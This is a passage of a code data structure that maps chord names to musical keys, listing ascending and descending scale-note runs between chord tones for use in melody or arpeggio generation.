'FMinor': [ [ ['Gs', 'As', 'C'], ['C', 'Cs', 'Ds'], ['Ds', 'F', 'G', 'Gs'] ], [ ['Gs', 'G', 'F', 'Ds'], ['C', 'As', 'Gs'], ['Ds', 'Cs', 'C'] ] ],
'CHMinor': [ [ ['Gs', 'B', 'C'], ['C', 'D', 'Ds'], ['Ds', 'F', 'G', 'Gs'] ], [ ['Gs', 'G', 'F', 'Ds'], ['C', 'B', 'Gs'], ['Ds', 'D', 'C'] ] ],
},
'Dm7': {
'CMajor': [ [ ['D', 'E', 'F'], ['F', 'G', 'A'], ['A', 'B', 'C', 'D'] ], [ ['D', 'C', 'B', 'A'], ['F', 'E', 'D'], ['A', 'G', 'F'] ] ],
'DMinor': [ [ ['D', 'E', 'F'], ['F', 'G', 'A'], ['A', 'As', 'C', 'D'] ], [ ['D', 'C', 'As', 'A'], ['F', 'E', 'D'], ['A', 'G', 'F'] ] ],
'FMajor': [ [ ['D', 'E', 'F'], ['F', 'G', 'A'], ['A', 'As', 'C', 'D'] ], [ ['D', 'C', 'As', 'A'], ['F', 'E', 'D'], ['A', 'G', 'F'] ] ],
'AsMajor': [ [ ['D', 'Ds', 'F'], ['F', 'G', 'A'], ['A', 'As', 'C', 'D'] ], [ ['D', 'C', 'As', 'A'], ['F', 'Ds', 'D'], ['A', 'G', 'F'] ] ],
'GMinor': [ [ ['D', 'Ds', 'F'], ['F', 'G', 'A'], ['A', 'As', 'C', 'D'] ], [ ['D', 'C', 'As', 'A'], ['F', 'Ds', 'D'], ['A', 'G', 'F'] ] ],
'AMinor': [ [ ['D', 'E', 'F'], ['F', 'G', 'A'], ['A', 'B', 'C', 'D'] ], [ ['D', 'C', 'B', 'A'], ['F', 'E', 'D'], ['A', 'G', 'F'] ] ],
},
'CMajor': {
'CMajor': [ [ ['C', 'D', 'E'], ['E', 'F', 'G'], ['G', 'A', 'B', 'C'] ], [ ['C', 'B', 'A', 'G'], ['E', 'D', 'C'], ['G', 'F', 'E'] ] ],
'GMajor': [ [ ['C', 'D', 'E'], ['E', 'Fs', 'G'], ['G', 'A', 'B', 'C'] ], [ ['C', 'B', 'A', 'G'], ['E', 'D', 'C'], ['G', 'Fs', 'E'] ] ],
'EMinor': [ [ ['C', 'D', 'E'], ['E', 'Fs', 'G'], ['G', 'A', 'B', 'C'] ], [ ['C', 'B', 'A', 'G'], ['E', 'D', 'C'], ['G', 'Fs', 'E'] ] ],
'DMinor': [ [ ['C', 'D', 'E'], ['E', 'F', 'G'], ['G', 'A', 'As', 'C'] ], [ ['C', 'As', 'A', 'G'], ['E', 'D', 'C'], ['G', 'F', 'E'] ] ],
'FMajor': [ [ ['C', 'D', 'E'], ['E', 'F', 'G'], ['G', 'A', 'As', 'C'] ], [ ['C', 'As', 'A', 'G'], ['E', 'D', 'C'], ['G', 'F', 'E'] ] ],
'AMinor': [ [ ['C', 'D', 'E'], ['E', 'F', 'G'], ['G', 'A', 'B', 'C'] ], [ ['C', 'B', 'A', 'G'], ['E', 'D', 'C'], ['G', 'F', 'E'] ] ],
},
'CsDim': {
'BMinor': [ [ ['Cs', 'D', 'E'], ['E', 'Fs', 'G'], ['G', 'A', 'B', 'Cs'] ], [ ['Cs', 'B', 'A', 'G'], ['E', 'D', 'Cs'], ['G', 'Fs', 'E'] ] ],
'DMajor': [ [ ['Cs', 'D', 'E'], ['E', 'Fs', 'G'], ['G', 'A', 'B', 'Cs'] ], [ ['Cs', 'B', 'A', 'G'], ['E', 'D', 'Cs'], ['G', 'Fs', 'E'] ] ],
},
'DsMinor': {
'CsMajor': [ [ ['Ds', 'F', 'Fs'], ['Fs', 'Gs', 'As'], ['As', 'C', 'Cs', 'Ds'] ], [ ['Ds', 'Cs', 'C', 'As'], ['Fs', 'F', 'Ds'], ['As', 'Gs', 'Fs'] ] ],
'GsMinor': [ [ ['Ds', 'E', 'Fs'], ['Fs', 'Gs', 'As'], ['As', 'B', 'Cs', 'Ds'] ], [ ['Ds', 'Cs', 'B', 'As'], ['Fs', 'E', 'Ds'], ['As', 'Gs', 'Fs'] ] ],
'BMajor': [ [ ['Ds', 'E', 'Fs'], ['Fs', 'Gs', 'As'], ['As', 'B', 'Cs', 'Ds'] ], [ ['Ds', 'Cs', 'B', 'As'], ['Fs', 'E', 'Ds'], ['As', 'Gs', 'Fs'] ] ],
'AsMinor': [ [ ['Ds', 'F', 'Fs'], ['Fs', 'Gs', 'As'], ['As', 'C', 'Cs', 'Ds'] ], [ ['Ds', 'Cs', 'C', 'As'], ['Fs', 'F', 'Ds'], ['As', 'Gs', 'Fs'] ] ],
'DsMinor': [ [ ['Ds', 'F', 'Fs'], ['Fs', 'Gs', 'As'], ['As', 'B', 'Cs', 'Ds'] ], [ ['Ds', 'Cs', 'B', 'As'], ['Fs', 'F', 'Ds'], ['As', 'Gs', 'Fs'] ] ],
'FsMajor': [ [ ['Ds', 'F', 'Fs'], ['Fs', 'Gs', 'As'], ['As', 'B', 'Cs', 'Ds'] ], [ ['Ds', 'Cs', 'B', 'As'], ['Fs', 'F', 'Ds'], ['As', 'Gs', 'Fs'] ] ],
},
'Em7': {
'CMajor': [ [ ['E', 'F', 'G'], ['G', 'A', 'B'], ['B', 'C', 'D', 'E'] ], [ ['E', 'D', 'C', 'B'], ['G', 'F', 'E'], ['B', 'A', 'G'] ] ],
'BMinor': [ [ ['E', 'Fs', 'G'], ['G', 'A', 'B'], ['B', 'Cs', 'D', 'E'] ], [ ['E', 'D', 'Cs', 'B'], ['G', 'Fs', 'E'], ['B', 'A', 'G'] ] ],
'GMajor': [ [ ['E', 'Fs', 'G'], ['G', 'A', 'B'], ['B', 'C', 'D', 'E'] ], [ ['E', 'D', 'C', 'B'], ['G', 'Fs', 'E'], ['B', 'A', 'G'] ] ],
'EMinor': [ [ ['E', 'Fs', 'G'], ['G', 'A', 'B'], ['B', 'C', 'D', 'E'] ], [ ['E', 'D', 'C', 'B'], ['G', 'Fs', 'E'], ['B', 'A', 'G'] ] ],
'AMinor': [ [ ['E', 'F', 'G'], ['G', 'A', 'B'], ['B', 'C', 'D', 'E'] ], [ ['E', 'D', 'C', 'B'], ['G', 'F', 'E'], ['B', 'A', 'G'] ] ],
'DMajor': [ [ ['E', 'Fs', 'G'], ['G', 'A', 'B'], ['B', 'Cs', 'D', 'E'] ], [ ['E', 'D', 'Cs', 'B'], ['G', 'Fs', 'E'], ['B', 'A', 'G'] ] ],
},
'Dsm7': {
'CsMajor': [ [ ['Ds', 'F', 'Fs'], ['Fs', 'Gs', 'As'], ['As', 'C', 'Cs', 'Ds'] ], [ ['Ds', 'Cs', 'C', 'As'], ['Fs', 'F', 'Ds'], ['As', 'Gs', 'Fs'] ] ],
'GsMinor': [ [ ['Ds', 'E', 'Fs'], ['Fs', 'Gs', 'As'], ['As', 'B', 'Cs', 'Ds'] ], [ ['Ds', 'Cs', 'B', 'As'], ['Fs', 'E', 'Ds'], ['As', 'Gs', 'Fs'] ] ],
'BMajor': [ [ ['Ds', 'E', 'Fs'], ['Fs', 'Gs', 'As'], ['As', 'B', 'Cs', 'Ds'] ], [ ['Ds', 'Cs', 'B', 'As'], ['Fs', 'E', 'Ds'], ['As', 'Gs', 'Fs'] ] ],
'AsMinor': [ [ ['Ds', 'F', 'Fs'], ['Fs', 'Gs', 'As'], ['As', 'C', 'Cs', 'Ds'] ], [ ['Ds', 'Cs', 'C', 'As'], ['Fs', 'F', 'Ds'], ['As', 'Gs', 'Fs'] ] ],
'DsMinor': [ [ ['Ds', 'F', 'Fs'], ['Fs', 'Gs', 'As'], ['As', 'B', 'Cs', 'Ds'] ], [ ['Ds', 'Cs', 'B', 'As'], ['Fs', 'F', 'Ds'], ['As', 'Gs', 'Fs'] ] ],
'FsMajor': [ [ ['Ds', 'F', 'Fs'], ['Fs', 'Gs', 'As'], ['As', 'B', 'Cs', 'Ds'] ], [ ['Ds', 'Cs', 'B', 'As'], ['Fs', 'F', 'Ds'], ['As', 'Gs', 'Fs'] ] ],
},
'DsDim': {
'CsMinor': [ [ ['Ds', 'E', 'Fs'], ['Fs', 'Gs', 'A'], ['A', 'B', 'Cs', 'Ds'] ], [ ['Ds', 'Cs', 'B', 'A'], ['Fs', 'E', 'Ds'], ['A', 'Gs', 'Fs'] ] ],
'EMajor': [ [ ['Ds', 'E', 'Fs'], ['Fs', 'Gs', 'A'], ['A', 'B', 'Cs', 'Ds'] ], [ ['Ds', 'Cs', 'B', 'A'], ['Fs', 'E', 'Ds'], ['A', 'Gs', 'Fs'] ] ],
},
'DMaj7': {
'BMinor': [ [ ['D', 'E', 'Fs'], ['Fs', 'G', 'A'], ['A', 'B', 'Cs', 'D'] ], [ ['D', 'Cs', 'B', 'A'], ['Fs', 'E', 'D'], ['A', 'G', 'Fs'] ] ],
'FsMinor': [ [ ['D', 'E', 'Fs'], ['Fs', 'Gs', 'A'], ['A', 'B', 'Cs', 'D'] ], [ ['D', 'Cs', 'B', 'A'], ['Fs', 'E', 'D'], ['A', 'Gs', 'Fs'] ] ],
'GMajor': [ [ ['D', 'E', 'Fs'], ['Fs', 'G', 'A'], ['A', 'B', 'C', 'D'] ], [ ['D', 'C', 'B', 'A'], ['Fs', 'E', 'D'], ['A', 'G', 'Fs'] ] ],
'EMinor': [ [ ['D', 'E', 'Fs'], ['Fs', 'G', 'A'], ['A', 'B', 'C', 'D'] ], [ ['D', 'C', 'B', 'A'], ['Fs', 'E', 'D'], ['A', 'G', 'Fs'] ] ],
'AMajor': [ [ ['D', 'E', 'Fs'], ['Fs', 'Gs', 'A'], ['A', 'B', 'Cs', 'D'] ], [ ['D', 'Cs', 'B', 'A'], ['Fs', 'E', 'D'], ['A', 'Gs', 'Fs'] ] ],
'DMajor': [ [ ['D', 'E', 'Fs'], ['Fs', 'G', 'A'], ['A', 'B', 'Cs', 'D'] ], [ ['D', 'Cs', 'B', 'A'], ['Fs', 'E', 'D'], ['A', 'G', 'Fs'] ] ],
},
'Fs7': {
'CsMajor': [ [ ['Fs', 'Gs', 'As'], ['As', 'C', 'Cs'], ['Cs', 'Ds', 'F', 'Fs'] ], [ ['Fs', 'F', 'Ds', 'Cs'], ['As', 'Gs', 'Fs'], ['Cs', 'C', 'As'] ] ],
'GsMinor': [ [ ['Fs', 'Gs', 'As'], ['As', 'B', 'Cs'], ['Cs', 'Ds', 'E', 'Fs'] ], [ ['Fs', 'E', 'Ds', 'Cs'], ['As', 'Gs', 'Fs'], ['Cs', 'B', 'As'] ] ],
'BMajor': [ [ ['Fs', 'Gs', 'As'], ['As', 'B', 'Cs'], ['Cs', 'Ds', 'E', 'Fs'] ], [ ['Fs', 'E', 'Ds', 'Cs'], ['As', 'Gs', 'Fs'], ['Cs', 'B', 'As'] ] ],
'AsMinor': [ [ ['Fs', 'Gs', 'As'], ['As', 'C', 'Cs'], ['Cs', 'Ds', 'F', 'Fs'] ], [ ['Fs', 'F', 'Ds', 'Cs'], ['As', 'Gs', 'Fs'], ['Cs', 'C', 'As'] ] ],
'DsMinor': [ [ ['Fs', 'Gs', 'As'], ['As', 'B', 'Cs'], ['Cs', 'Ds', 'F', 'Fs'] ], [ ['Fs', 'F', 'Ds', 'Cs'], ['As', 'Gs', 'Fs'], ['Cs', 'B', 'As'] ] ],
'FsMajor': [ [ ['Fs', 'Gs', 'As'], ['As', 'B', 'Cs'], ['Cs', 'Ds', 'F', 'Fs'] ], [ ['Fs', 'F', 'Ds', 'Cs'], ['As', 'Gs', 'Fs'], ['Cs', 'B', 'As'] ] ],
},
'Cm7': {
'GsMajor': [ [ ['C', 'Cs', 'Ds'], ['Ds', 'F', 'G'], ['G', 'Gs', 'As', 'C'] ], [ ['C', 'As', 'Gs', 'G'], ['Ds', 'Cs', 'C'], ['G', 'F', 'Ds'] ] ],
'CMinor': [ [ ['C', 'D', 'Ds'], ['Ds', 'F', 'G'], ['G', 'Gs', 'As', 'C'] ], [ ['C', 'As', 'Gs', 'G'], ['Ds', 'D', 'C'], ['G', 'F', 'Ds'] ] ],
'DsMajor': [ [ ['C', 'D', 'Ds'], ['Ds', 'F', 'G'], ['G', 'Gs', 'As', 'C'] ], [ ['C', 'As', 'Gs', 'G'], ['Ds', 'D', 'C'], ['G', 'F', 'Ds'] ] ],
'AsMajor': [ [ ['C', 'D', 'Ds'], ['Ds', 'F', 'G'], ['G', 'A', 'As', 'C'] ], [ ['C', 'As', 'A', 'G'], ['Ds', 'D', 'C'], ['G', 'F', 'Ds'] ] ],
'FMinor': [ [ ['C', 'Cs', 'Ds'], ['Ds', 'F', 'G'], ['G', 'Gs', 'As', 'C'] ], [ ['C', 'As', 'Gs', 'G'], ['Ds', 'Cs', 'C'], ['G', 'F', 'Ds'] ] ],
'CHMinor': [ [ ['C', 'D', 'Ds'], ['Ds', 'F', 'G'], ['G', 'Gs', 'B', 'C'] ], [ ['C', 'B', 'Gs', 'G'], ['Ds', 'D', 'C'], ['G', 'F', 'Ds'] ] ],
'GMinor': [ [ ['C', 'D', 'Ds'], ['Ds', 'F', 'G'], ['G', 'A', 'As', 'C'] ], [ ['C', 'As', 'A', 'G'], ['Ds', 'D', 'C'], ['G', 'F', 'Ds'] ] ],
},
'CsMinor': {
'CsMinor': [ [ ['Cs', 'Ds', 'E'], ['E', 'Fs', 'Gs'], ['Gs', 'A', 'B', 'Cs'] ], [ ['Cs', 'B', 'A', 'Gs'], ['E', 'Ds', 'Cs'], ['Gs', 'Fs', 'E'] ] ],
'FsMinor': [ [ ['Cs', 'D', 'E'], ['E', 'Fs', 'Gs'], ['Gs', 'A', 'B', 'Cs'] ], [ ['Cs', 'B', 'A', 'Gs'], ['E', 'D', 'Cs'], ['Gs', 'Fs', 'E'] ] ],
'GsMinor': [ [ ['Cs', 'Ds', 'E'], ['E', 'Fs', 'Gs'], ['Gs', 'As', 'B', 'Cs'] ], [ ['Cs', 'B', 'As', 'Gs'], ['E', 'Ds', 'Cs'], ['Gs', 'Fs', 'E'] ] ],
'BMajor': [ [ ['Cs', 'Ds', 'E'], ['E', 'Fs', 'Gs'], ['Gs', 'As', 'B', 'Cs'] ], [ ['Cs', 'B', 'As', 'Gs'], ['E', 'Ds', 'Cs'], ['Gs', 'Fs', 'E'] ] ],
'AMajor': [ [ ['Cs', 'D', 'E'], ['E', 'Fs', 'Gs'], ['Gs', 'A', 'B', 'Cs'] ], [ ['Cs', 'B', 'A', 'Gs'], ['E', 'D', 'Cs'], ['Gs', 'Fs', 'E'] ] ],
'EMajor': [ [ ['Cs', 'Ds', 'E'], ['E', 'Fs', 'Gs'], ['Gs', 'A', 'B', 'Cs'] ], [ ['Cs', 'B', 'A', 'Gs'], ['E', 'Ds', 'Cs'], ['Gs', 'Fs', 'E'] ] ],
},
'FsMinor': {
'BMinor': [ [ ['Fs', 'G', 'A'], ['A', 'B', 'Cs'], ['Cs', 'D', 'E', 'Fs'] ], [ ['Fs', 'E', 'D', 'Cs'], ['A', 'G', 'Fs'], ['Cs', 'B', 'A'] ] ],
'CsMinor': [ [ ['Fs', 'Gs', 'A'], ['A', 'B', 'Cs'], ['Cs', 'Ds', 'E', 'Fs'] ], [ ['Fs', 'E', 'Ds', 'Cs'], ['A', 'Gs', 'Fs'], ['Cs', 'B', 'A'] ] ],
'FsMinor': [ [ ['Fs', 'Gs', 'A'], ['A', 'B', 'Cs'], ['Cs', 'D', 'E', 'Fs'] ], [ ['Fs', 'E', 'D', 'Cs'], ['A', 'Gs', 'Fs'], ['Cs', 'B', 'A'] ] ],
'AMajor': [ [ ['Fs', 'Gs', 'A'], ['A', 'B', 'Cs'], ['Cs', 'D', 'E', 'Fs'] ], [ ['Fs', 'E', 'D', 'Cs'], ['A', 'Gs', 'Fs'], ['Cs', 'B', 'A'] ] ],
'EMajor': [ [ ['Fs', 'Gs', 'A'], ['A', 'B', 'Cs'], ['Cs', 'Ds', 'E', 'Fs'] ], [ ['Fs', 'E', 'Ds', 'Cs'], ['A', 'Gs', 'Fs'], ['Cs', 'B', 'A'] ] ],
'DMajor': [ [ ['Fs', 'G', 'A'], ['A', 'B', 'Cs'], ['Cs', 'D', 'E', 'Fs'] ], [ ['Fs', 'E', 'D', 'Cs'], ['A', 'G', 'Fs'], ['Cs', 'B', 'A'] ] ],
},
'DsMaj7': {
'GsMajor': [ [ ['Ds', 'F', 'G'], ['G', 'Gs', 'As'], ['As', 'C', 'Cs', 'Ds'] ], [ ['Ds', 'Cs', 'C', 'As'], ['G', 'F', 'Ds'], ['As', 'Gs', 'G'] ] ],
'CMinor': [ [ ['Ds', 'F', 'G'], ['G', 'Gs', 'As'], ['As', 'C', 'D', 'Ds'] ], [ ['Ds', 'D', 'C', 'As'], ['G', 'F', 'Ds'], ['As', 'Gs', 'G'] ] ],
'DsMajor': [ [ ['Ds', 'F', 'G'], ['G', 'Gs', 'As'], ['As', 'C', 'D', 'Ds'] ], [ ['Ds', 'D', 'C', 'As'], ['G', 'F', 'Ds'], ['As', 'Gs', 'G'] ] ],
'AsMajor': [ [ ['Ds', 'F', 'G'], ['G', 'A', 'As'], ['As', 'C', 'D', 'Ds'] ], [ ['Ds', 'D', 'C', 'As'], ['G', 'F', 'Ds'], ['As', 'A', 'G'] ] ],
'FMinor': [ [ ['Ds', 'F', 'G'], ['G', 'Gs', 'As'], ['As', 'C', 'Cs', 'Ds'] ], [ ['Ds', 'Cs', 'C', 'As'], ['G', 'F', 'Ds'], ['As', 'Gs', 'G'] ] ],
'GMinor': [ [ ['Ds', 'F', 'G'], ['G', 'A', 'As'], ['As', 'C', 'D', 'Ds'] ], [ ['Ds', 'D', 'C', 'As'], ['G', 'F', 'Ds'], ['As', 'A', 'G'] ] ],
},
'GMajor': {
'CMajor': [ [ ['G', 'A', 'B'], ['B', 'C', 'D'], ['D', 'E', 'F', 'G'] ], [ ['G', 'F', 'E', 'D'], ['B', 'A', 'G'], ['D', 'C', 'B'] ] ],
'BMinor': [ [ ['G', 'A', 'B'], ['B', 'Cs', 'D'], ['D', 'E', 'Fs', 'G'] ], [ ['G', 'Fs', 'E', 'D'], ['B', 'A', 'G'], ['D', 'Cs', 'B'] ] ],
'GMajor': [ [ ['G', 'A', 'B'], ['B', 'C', 'D'], ['D', 'E', 'Fs', 'G'] ], [ ['G', 'Fs', 'E', 'D'], ['B', 'A', 'G'], ['D', 'C', 'B'] ] ],
'EMinor': [ [ ['G', 'A', 'B'], ['B', 'C', 'D'], ['D', 'E', 'Fs', 'G'] ], [ ['G', 'Fs', 'E', 'D'], ['B', 'A', 'G'], ['D', 'C', 'B'] ] ],
'CHMinor': [ [ ['G', 'Gs', 'B'], ['B', 'C', 'D'], ['D', 'Ds', 'F', 'G'] ], [ ['G', 'F', 'Ds', 'D'], ['B', 'Gs', 'G'], ['D', 'C', 'B'] ] ],
'AMinor': [ [ ['G', 'A', 'B'], ['B', 'C', 'D'], ['D', 'E', 'F', 'G'] ], [ ['G', 'F', 'E', 'D'], ['B', 'A', 'G'], ['D', 'C', 'B'] ] ],
'DMajor': [ [ ['G', 'A', 'B'], ['B', 'Cs', 'D'], ['D', 'E', 'Fs', 'G'] ], [ ['G', 'Fs', 'E', 'D'], ['B', 'A', 'G'], ['D', 'Cs', 'B'] ] ],
},
'BMajor': {
'CsMinor': [ [ ['B', 'Cs', 'Ds'], ['Ds', 'E', 'Fs'], ['Fs', 'Gs', 'A', 'B'] ], [ ['B', 'A', 'Gs', 'Fs'], ['Ds', 'Cs', 'B'], ['Fs', 'E', 'Ds'] ] ],
'GsMinor': [ [ ['B', 'Cs', 'Ds'], ['Ds', 'E', 'Fs'], ['Fs', 'Gs', 'As', 'B'] ], [ ['B', 'As', 'Gs', 'Fs'], ['Ds', 'Cs', 'B'], ['Fs', 'E', 'Ds'] ] ],
'BMajor': [ [ ['B', 'Cs', 'Ds'], ['Ds', 'E', 'Fs'], ['Fs', 'Gs', 'As', 'B'] ], [ ['B', 'As', 'Gs', 'Fs'], ['Ds', 'Cs', 'B'], ['Fs', 'E', 'Ds'] ] ],
'DsMinor': [ [ ['B', 'Cs', 'Ds'], ['Ds', 'F', 'Fs'], ['Fs', 'Gs', 'As', 'B'] ], [ ['B', 'As', 'Gs', 'Fs'], ['Ds', 'Cs', 'B'], ['Fs', 'F', 'Ds'] ] ],
'EMajor': [ [ ['B', 'Cs', 'Ds'], ['Ds', 'E', 'Fs'], ['Fs', 'Gs', 'A', 'B'] ], [ ['B', 'A', 'Gs', 'Fs'], ['Ds', 'Cs', 'B'], ['Fs', 'E', 'Ds'] ] ],
'FsMajor': [ [ ['B', 'Cs', 'Ds'], ['Ds', 'F', 'Fs'], ['Fs', 'Gs', 'As', 'B'] ], [ ['B', 'As', 'Gs', 'Fs'], ['Ds', 'Cs', 'B'], ['Fs', 'F', 'Ds'] ] ],
},
'BMinor': {
'BMinor': [ [ ['B', 'Cs', 'D'], ['D', 'E', 'Fs'], ['Fs', 'G', 'A', 'B'] ], [ ['B', 'A', 'G', 'Fs'], ['D', 'Cs', 'B'], ['Fs', 'E', 'D'] ] ],
'FsMinor': [ [ ['B', 'Cs', 'D'], ['D', 'E', 'Fs'], ['Fs', 'Gs', 'A', 'B'] ], [ ['B', 'A', 'Gs', 'Fs'], ['D', 'Cs', 'B'], ['Fs', 'E', 'D'] ] ],
'GMajor': [ [ ['B', 'C', 'D'], ['D', 'E', 'Fs'], ['Fs', 'G', 'A', 'B'] ], [ ['B', 'A', 'G', 'Fs'], ['D', 'C', 'B'], ['Fs', 'E', 'D'] ] ],
'EMinor': [ [ ['B', 'C', 'D'], ['D', 'E', 'Fs'], ['Fs', 'G', 'A', 'B'] ], [ ['B', 'A', 'G', 'Fs'], ['D', 'C', 'B'], ['Fs', 'E', 'D'] ] ],
'AMajor': [ [ ['B', 'Cs', 'D'], ['D', 'E', 'Fs'], ['Fs', 'Gs', 'A', 'B'] ], [ ['B', 'A', 'Gs', 'Fs'], ['D', 'Cs', 'B'], ['Fs', 'E', 'D'] ] ],
'DMajor': [ [ ['B', 'Cs', 'D'], ['D', 'E', 'Fs'], ['Fs', 'G', 'A', 'B'] ], [ ['B', 'A', 'G', 'Fs'], ['D', 'Cs', 'B'], ['Fs', 'E', 'D'] ] ],
},
'EMinor': {
'CMajor': [ [ ['E', 'F', 'G'], ['G', 'A', 'B'], ['B', 'C', 'D', 'E'] ], [ ['E', 'D', 'C', 'B'], ['G', 'F', 'E'], ['B', 'A', 'G'] ] ],
'BMinor': [ [ ['E', 'Fs', 'G'], ['G', 'A', 'B'], ['B', 'Cs', 'D', 'E'] ], [ ['E', 'D', 'Cs', 'B'], ['G', 'Fs', 'E'], ['B', 'A', 'G'] ] ],
'GMajor': [ [ ['E', 'Fs', 'G'], ['G', 'A', 'B'], ['B', 'C', 'D', 'E'] ], [ ['E', 'D', 'C', 'B'], ['G', 'Fs', 'E'], ['B', 'A', 'G'] ] ],
'EMinor': [ [ ['E', 'Fs', 'G'], ['G', 'A', 'B'], ['B', 'C', 'D', 'E'] ], [ ['E', 'D', 'C', 'B'], ['G', 'Fs', 'E'], ['B', 'A', 'G'] ] ],
'AMinor': [ [ ['E', 'F', 'G'], ['G', 'A', 'B'], ['B', 'C', 'D', 'E'] ], [ ['E', 'D', 'C', 'B'], ['G', 'F', 'E'], ['B', 'A', 'G'] ] ],
'DMajor': [ [ ['E', 'Fs', 'G'], ['G', 'A', 'B'], ['B', 'Cs', 'D', 'E'] ], [ ['E', 'D', 'Cs', 'B'], ['G', 'Fs', 'E'], ['B', 'A', 'G'] ] ],
},
'CsMaj7': {
'GsMajor': [ [ ['Cs', 'Ds', 'F'], ['F', 'G', 'Gs'], ['Gs', 'As', 'C', 'Cs'] ], [ ['Cs', 'C', 'As', 'Gs'], ['F', 'Ds', 'Cs'], ['Gs', 'G', 'F'] ] ],
'CsMajor': [ [ ['Cs', 'Ds', 'F'], ['F', 'Fs', 'Gs'], ['Gs', 'As', 'C', 'Cs'] ], [ ['Cs', 'C', 'As', 'Gs'], ['F', 'Ds', 'Cs'], ['Gs', 'Fs', 'F'] ] ],
'AsMinor': [ [ ['Cs', 'Ds', 'F'], ['F', 'Fs', 'Gs'], ['Gs', 'As', 'C', 'Cs'] ], [ ['Cs', 'C', 'As', 'Gs'], ['F', 'Ds', 'Cs'], ['Gs', 'Fs', 'F'] ] ],
'DsMinor': [ [ ['Cs', 'Ds', 'F'], ['F', 'Fs', 'Gs'], ['Gs', 'As', 'B', 'Cs'] ], [ ['Cs', 'B', 'As', 'Gs'], ['F', 'Ds', 'Cs'], ['Gs', 'Fs', 'F'] ] ],
'FMinor': [ [ ['Cs', 'Ds', 'F'], ['F', 'G', 'Gs'], ['Gs', 'As', 'C', 'Cs'] ], [ ['Cs', 'C', 'As', 'Gs'], ['F', 'Ds', 'Cs'], ['Gs', 'G', 'F'] ] ],
'FsMajor': [ [ ['Cs', 'Ds', 'F'], ['F', 'Fs', 'Gs'], ['Gs', 'As', 'B', 'Cs'] ], [ ['Cs', 'B', 'As', 'Gs'], ['F', 'Ds', 'Cs'], ['Gs', 'Fs', 'F'] ] ],
},
'FDim': {
'DsMinor': [ [ ['F', 'Fs', 'Gs'], ['Gs', 'As', 'B'], ['B', 'Cs', 'Ds', 'F'] ], [ ['F', 'Ds', 'Cs', 'B'], ['Gs', 'Fs', 'F'], ['B', 'As', 'Gs'] ] ],
'CHMinor': [ [ ['F', 'G', 'Gs'], ['Gs', 'B', 'C'], ['B', 'C', 'D', 'Ds'] ], [ ['F', 'Ds', 'D', 'C'], ['Gs', 'G', 'F'], ['B', 'Gs', 'G'] ] ],
'FsMajor': [ [ ['F', 'Fs', 'Gs'], ['Gs', 'As', 'B'], ['B', 'Cs', 'Ds', 'F'] ], [ ['F', 'Ds', 'Cs', 'B'], ['Gs', 'Fs', 'F'], ['B', 'As', 'Gs'] ] ],
},
'DMinor': {
'CMajor': [ [ ['D', 'E', 'F'], ['F', 'G', 'A'], ['A', 'B', 'C', 'D'] ], [ ['D', 'C', 'B', 'A'], ['F', 'E', 'D'], ['A', 'G', 'F'] ] ],
'DMinor': [ [ ['D', 'E', 'F'], ['F', 'G', 'A'], ['A', 'As', 'C', 'D'] ], [ ['D', 'C', 'As', 'A'], ['F', 'E', 'D'], ['A', 'G', 'F'] ] ],
'FMajor': [ [ ['D', 'E', 'F'], ['F', 'G', 'A'], ['A', 'As', 'C', 'D'] ], [ ['D', 'C', 'As', 'A'], ['F', 'E', 'D'], ['A', 'G', 'F'] ] ],
'AsMajor': [ [ ['D', 'Ds', 'F'], ['F', 'G', 'A'], ['A', 'As', 'C', 'D'] ], [ ['D', 'C', 'As', 'A'], ['F', 'Ds', 'D'], ['A', 'G', 'F'] ] ],
'GMinor': [ [ ['D', 'Ds', 'F'], ['F', 'G', 'A'], ['A', 'As', 'C', 'D'] ], [ ['D', 'C', 'As', 'A'], ['F', 'Ds', 'D'], ['A', 'G', 'F'] ] ],
'AMinor': [ [ ['D', 'E', 'F'], ['F', 'G', 'A'], ['A', 'B', 'C', 'D'] ], [ ['D', 'C', 'B', 'A'], ['F', 'E', 'D'], ['A', 'G', 'F'] ] ],
},
'FMajor': {
'CMajor': [ [ ['F', 'G', 'A'], ['A', 'B', 'C'], ['C', 'D', 'E', 'F'] ], [ ['F', 'E', 'D', 'C'], ['A', 'G', 'F'], ['C', 'B', 'A'] ] ],
'DMinor': [ [ ['F', 'G', 'A'], ['A', 'As', 'C'], ['C', 'D', 'E', 'F'] ], [ ['F', 'E', 'D', 'C'], ['A', 'G', 'F'], ['C', 'As', 'A'] ] ],
'FMajor': [ [ ['F', 'G', 'A'], ['A', 'As', 'C'], ['C', 'D', 'E', 'F'] ], [ ['F', 'E', 'D', 'C'], ['A', 'G', 'F'], ['C', 'As', 'A'] ] ],
'AsMajor': [ [ ['F', 'G', 'A'], ['A', 'As', 'C'], ['C', 'D', 'Ds', 'F'] ], [ ['F', 'Ds', 'D', 'C'], ['A', 'G', 'F'], ['C', 'As', 'A'] ] ],
'GMinor': [ [ ['F', 'G', 'A'], ['A', 'As', 'C'], ['C', 'D', 'Ds', 'F'] ], [ ['F', 'Ds', 'D', 'C'], ['A', 'G', 'F'], ['C', 'As', 'A'] ] ],
'AMinor': [ [ ['F', 'G', 'A'], ['A', 'B', 'C'], ['C', 'D', 'E', 'F'] ], [ ['F', 'E', 'D', 'C'], ['A', 'G', 'F'], ['C', 'B', 'A'] ] ],
},
'ADim': {
'AsMajor': [ [ ['A', 'As', 'C'], ['C', 'D', 'Ds'], ['Ds', 'F', 'G', 'A'] ], [ ['A', 'G', 'F', 'Ds'], ['C', 'As', 'A'], ['Ds', 'D', 'C'] ] ],
'GMinor': [ [ ['A', 'As', 'C'], ['C', 'D', 'Ds'], ['Ds', 'F', 'G', 'A'] ], [ ['A', 'G', 'F', 'Ds'], ['C', 'As', 'A'], ['Ds', 'D', 'C'] ] ],
},
'CMinor': {
'GsMajor': [ [ ['C', 'Cs', 'Ds'], ['Ds', 'F', 'G'], ['G', 'Gs', 'As', 'C'] ], [ ['C', 'As', 'Gs', 'G'], ['Ds', 'Cs', 'C'], ['G', 'F', 'Ds'] ] ],
'CMinor': [ [ ['C', 'D', 'Ds'], ['Ds', 'F', 'G'], ['G', 'Gs', 'As', 'C'] ], [ ['C', 'As', 'Gs', 'G'], ['Ds', 'D', 'C'], ['G', 'F', 'Ds'] ] ],
'DsMajor': [ [ ['C', 'D', 'Ds'], ['Ds', 'F', 'G'], ['G', 'Gs', 'As', 'C'] ], [ ['C', 'As', 'Gs', 'G'], ['Ds', 'D', 'C'], ['G', 'F', 'Ds'] ] ],
